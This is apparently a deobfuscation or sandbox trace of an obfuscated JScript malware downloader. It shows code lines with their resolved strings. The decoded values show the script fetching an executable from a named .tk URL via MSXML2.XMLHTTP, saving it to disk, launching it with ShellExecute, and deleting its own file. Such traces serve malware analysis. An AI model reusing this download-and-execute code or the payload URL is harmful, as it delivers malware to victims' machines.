                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute
                                                                                                                                                                                                                                                                                                                        143
                                                                                                                                                                                                                                                                                                                        return _0xe99d =
                                                                                                                                                                                                                                                                                                                          144
                                                                                                                                                                                                                                                                                                                          function (_0xe99d3f, _0x318392) {
                                                                                                                                                                                                                                                                                                                          • _0xe99d(234,undefined) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(260,undefined) ➔ "push"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(234,undefined) ➔ "W4ZdJrRdRue"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(260,undefined) ➔ "76392yWuOtG"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(233,undefined) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(234,undefined) ➔ "421620Dulpsf"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(260,undefined) ➔ "W73dVr7dRxtcHSkIW4xcK27cLSoWWOa"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(233,undefined) ➔ "W4ZdJrRdRue"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(234,undefined) ➔ "282elZIVv"
                                                                                                                                                                                                                                                                                                                          • _0xe99d(260,undefined) ➔ "5991OPUtAM"
                                                                                                                                                                                                                                                                                                                          145
                                                                                                                                                                                                                                                                                                                          _0xe99d3f = _0xe99d3f - 0xc8;
                                                                                                                                                                                                                                                                                                                            146
                                                                                                                                                                                                                                                                                                                            var _0x59ecb7 = _0x3974d[_0xe99d3f];
                                                                                                                                                                                                                                                                                                                              147
                                                                                                                                                                                                                                                                                                                              return _0x59ecb7;
                                                                                                                                                                                                                                                                                                                                148
                                                                                                                                                                                                                                                                                                                                }, _0xe99d ( _0x304024, _0x5125dd );
                                                                                                                                                                                                                                                                                                                                  149
                                                                                                                                                                                                                                                                                                                                  }
                                                                                                                                                                                                                                                                                                                                    150
                                                                                                                                                                                                                                                                                                                                    function _0x4a61() {
                                                                                                                                                                                                                                                                                                                                    • _0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD
                                                                                                                                                                                                                                                                                                                                    151
                                                                                                                                                                                                                                                                                                                                    var _0x295f59 = _0x5099, _0x126005 = _0x56566c, _0x377202 = [ _0x126005 ( 0xef ), 'Open', _0x126005 ( 0xe7 ), 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW', _0x126005 ( 0xda ), _0x126005 ( 0x10c ), _0x126005 ( 0xf7 ), _0x126005 ( 0xf3 ), _0x295f59 ( 0xe6, 'J(3^' ), _0x126005 ( 0xf9 ), _0x126005 ( 0xd8 ), _0x126005 ( 0xe5 ), _0x126005 ( 0xcb ), 'vcFcV8kjWRZdHmk4WROea0xcUa', _0x126005 ( 0xf2 ), _0x126005 ( 0xec ), _0x126005 ( 0xfd ), '995898DfgeKn', _0x295f59 ( 0x109, '!Ro&' ), _0x295f59 ( 0xe0, 'e(J5' ), 'Type', _0x295f59 ( 0xfe, 'h2t$' ), _0x126005 ( 0x102 ), _0x295f59 ( 0x10b, 'pUd0' ), _0x126005 ( 0xee ), 'xSkvWPCOWOniFvTXeCkMbCkL', _0x295f59 ( 0xf0, 'Uvs9' ), _0x295f59 ( 0xca, 'cLA8' ), _0x126005 ( 0x107 ), 'W4NdNCkFW6WLcfzu', 'Shell.Application', _0x295f59 ( 0xd3, '4J2k' ), _0x295f59 ( 0xc9, 'IG#1' ), _0x126005 ( 0x103 ), _0x295f59 ( 0xde, 'Umy3' ), _0x126005 ( 0xd1 ) ];
                                                                                                                                                                                                                                                                                                                                    • _0x126005(239) ➔ "Send"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(231) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(218) ➔ "428748eDivLq"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(268) ➔ "uqtdR8kPceWHW5tdNW"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(247) ➔ "AJ3cTmowW6WowIz1WO5WW4O"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(243) ➔ "W4yuy1BdPSoFWOOIgCo6qge"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(230,"J(3^") ➔ "SaveToFile"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(249) ➔ "WQ3cNSkvBW"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(216) ➔ "W4BcISoRW5qtgXxcIx3cPCog"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(229) ➔ "W5pdICkQkCk1WQ53WQZdRCo6tSoA"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(203) ➔ "279BGVghm"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(242) ➔ "WOZcHCkvkCo+WOXZnuxcKKbM"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(236) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(253) ➔ "https://tgc8x.tk/tt/VNZVNCXKKJSF.exe"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(265,"!Ro&") ➔ "5QEmMYO"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(224,"e(J5") ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(254,"h2t$") ➔ "W7pdMCoine3dQ8oDW6rTaczvl1e"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(258) ➔ "76392yWuOtG"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(267,"pUd0") ➔ "WRRcG8o6"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(238) ➔ "1268392teACcP"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(240,"Uvs9") ➔ "\VNZVNCXKKJSF.exe"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(202,"cLA8") ➔ "CreateObject"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(263) ➔ "Position"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(211,"4J2k") ➔ "463900CaNtRp"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(201,"IG#1") ➔ "W4BcLCo0oJRcS8kdW4SaWO1/WQaN"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(259) ➔ "W73dVr7dRxtcHSkIW4xcK27cLSoWWOa"
                                                                                                                                                                                                                                                                                                                                    • _0x295f59(222,"Umy3") ➔ "W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko"
                                                                                                                                                                                                                                                                                                                                    • _0x126005(209) ➔ "W4SFgdRcImkKWOiD"
                                                                                                                                                                                                                                                                                                                                    152
                                                                                                                                                                                                                                                                                                                                    return _0x4a61 =
                                                                                                                                                                                                                                                                                                                                      153
                                                                                                                                                                                                                                                                                                                                      function () {
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open
                                                                                                                                                                                                                                                                                                                                      • _0x4a61() ➔ DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open
                                                                                                                                                                                                                                                                                                                                      154
                                                                                                                                                                                                                                                                                                                                      return _0x377202;
                                                                                                                                                                                                                                                                                                                                        155
                                                                                                                                                                                                                                                                                                                                        }, _0x4a61 ( );
                                                                                                                                                                                                                                                                                                                                          156
                                                                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                                                                            157
